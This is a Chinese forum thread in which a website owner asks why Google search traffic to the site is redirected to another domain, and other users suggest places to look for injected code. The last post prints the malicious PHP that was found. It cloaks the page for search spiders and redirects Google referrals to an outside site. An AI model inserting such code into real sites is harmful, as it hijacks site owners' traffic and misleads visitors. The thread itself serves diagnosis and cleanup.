谷歌搜索结果被劫持了，怎么解决呢？

妃子笑 · 发表于 2017-11-25 16:59:07

大家好，好久不见啦 @！

我遇到一个很奇怪的问题，我的网站 www.mg21.com

在谷歌的搜索结果全部被劫持到另外一个网站去，比如我 site:www.mg21.com 找到自己的网站，点进去以后，会被劫持到另外一个网站 zb128.cc

而百度和bing等的搜索结果就不会劫持，直接访问也OK，其他地方的外链进来也OK，只有谷歌的流量进不来。

我想着加个SSL，可是弄半天也没弄好，有点尴尬。

有没有遇到这个情况的？给个解决思路啊！谢谢啦！

晕蛋疯亲 · 发表于 2017-11-25 17:07:47

明显被黑了，查下是不是被挂JS了

妃子笑 · 发表于 2017-11-25 17:11:27

晕蛋疯亲发表于 2017-11-25 17:07
- |# F0 V4 L# C; X' G9 g( R明显被黑了，查下是不是被挂JS了

我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

晕蛋疯亲 · 发表于 2017-11-25 17:20:03

妃子笑发表于 2017-11-25 17:11% r& J- L. R) j
我不懂查，只是在线用了360，还有几个检测挂马的工具，都没查出来。

加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改过，那就只能自己手动慢慢查了，文件多挺累人的

妃子笑 · 发表于 2017-11-25 18:08:48

晕蛋疯亲发表于 2017-11-25 17:20
. X7 Z1 G5 t3 J( H0 K加密的怕是查不出，去FTP里面看下，有没有新增加的文件，看文件日期有没有最近修改过，如果文件日期被改 ...

应该不是js吧，我把所有的JS文件全部删除了，重新从wp官方下载了，再上传，还是一样呢？

ceom123 · 发表于 2017-11-25 18:10:42

我这不会啊。我用谷歌搜索了再点进去。正常显示，没有跳转。

妃子笑 · 发表于 2017-11-25 18:26:22

ceom123 发表于 2017-11-25 18:10" X, R* W2 L0 V/ u
我这不会啊。我用谷歌搜索了再点进去。正常显示，没有跳转。

你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？

那如果这样的话，是我的电脑DNS被劫持了吗？

小白龙 · 发表于 2017-11-25 19:03:45

荔枝姐好

1198345 · 发表于 2017-11-25 19:17:52

使用D盾查一下

qiqinjun · 发表于 2017-11-25 19:40:43

这个应该是加了代码进去，一般是三个地方，第一个是网页的源代码里面，直接右键查看源代码就可以看到，第二个是程序里面加判断跳转代码，如果程序简单的话，也好找出来，第三个应该就是.htaccess文件，判断谷歌来路，然后跳转，一眼就可以看出来，你去找找这三个地方试试

wxmd · 发表于 2017-11-25 20:18:19

荔枝现在做啥了，还搞主机AFF吗？

c21xdx · 发表于 2017-11-25 20:48:38

按照10楼大佬说的来。可以把网站文件都下载到你本地的电脑上，用9楼说的 D盾来扫描你的所有网站文件，看看有没有什么可疑代码，360什么的没用的，这只是别人偷偷在你的网站空间里偷偷添加了一个跳转文件或者就直接在你原本的某个网站文件里直接添加了一些代码用来判断来路，如果来路是谷歌搜索来的，就进行跳转到其它网站，其它来路或者没有来路（就是直接出入域名打开）就不进行跳转。如果D盾有提示出什么可疑代码，可以把那一段贴到论坛来，这里很多程序大牛可以帮你看看的。如果没提示找到什么可疑代码，你觉得合适的可以贴出来的话，如果你的网站空间是用apache的话，在网站根目录下找到10楼大佬说的.htaccess贴出来看看，如果是nginx的话，就找到vhost下的域名配置文件，如果你的网站是在VPS上的。

沐风 · 发表于 2017-11-25 21:18:25

中国移动，四川成都。
网页被跳转了……
估计不像是运营商干的，也不是DNS污染或劫持。
而是你的网站，确实被加了JS代码。
这和我的Cloak做的跳转一样……

查一下你的网页代码吧，很可能是被加到了主题文件中。

ceom123 · 发表于 2017-11-26 01:44:33

妃子笑发表于 2017-11-25 18:26( M$ o/ j* b% T1 Q! h
你是说你在谷歌收到我的网站，点击链接，不会跳转到其他网站吗？# k$ ~' ^& I% L, S4 V, m8 s [. o
6 W4 Q0 h( M% T" L3 P% N# h
那如果这样的话，是我的电脑DNS被劫持了 ...

是的，我用site: 搜索你的网站，然后点击其中的一个结果。正常跳转。

妃子笑 · 发表于 2017-11-26 04:22:32

谢谢大家，用D盾查到问题了，被挂了一段代码：

<?php
if (ereg("http://www.baidu.com/search/spider.htm", $_SERVER["HTTP_USER_AGENT"])) {
$file = file_get_contents('http://www。zb128。cc');
echo $file;//
exit;
}
if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) {
Header("Location: http://www。zb128。cc");//
exit;
}

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	⚡️AdsPower:安全不封号,高效自动化	Mediabuy⚡️玩家开户首选
【鲁班跨境通-自助充值转账】	FB/GG/TT❤️官方免费开户	Affiliate 全媒体流量资源⚡️	Taboola/Outbrain /Bing⚡️一级代理
*开户投流-724h❤️人工在线**	【官方】❤️搜索套利买量投流开户	独立站⚡️开户投放	FB BM不限额，短id账单户
E.PN 虚拟卡	BINOM TRACKER 60% OFF!	比Adplexity还好用的Spy工具	ADPLEXITY + ADVERTCN
7200W全球动态不重复住宅IP代理	虚拟信用卡+独立站收款	全球虚拟卡, 支持U充值	Facebook 批量上广告
尤里改 - FB 稳定投放	免费黑五教程（持续更新、欢迎交流）	FB 三不限源头 - 自助下户充值转款	各种主页、账单户、BM户（优势）
⚡️个人户，bm户不限额，账单户	Google、Bing官方总代联盟流量开户	FB企业户,TT老户,GG老户源头	海外CL企业户源头
PTM全球虚拟卡—进来交个朋友!	PTM虚拟卡⚡️费率透明⚡️额度随心	FB虚拟卡⚡️消费越多返现越多	【找量】BA独家Nutra单找量
虚拟FB卡 ⚡️ 透明条件	国内外持牌，虚拟信用卡和收付款	->Tyver SPY汇聚海量广告创意	广告位出租
8500万高质量住宅IP，助力各种需求	虚拟卡返佣1%，国内持牌机构

[讨论] 谷歌搜索结果被劫持了，怎么解决呢？

点评

点评

点评

评分

点评

点评

点评

评分

评分

点评

评分

本帖子中包含更多资源

评分

评分

社区QQ达人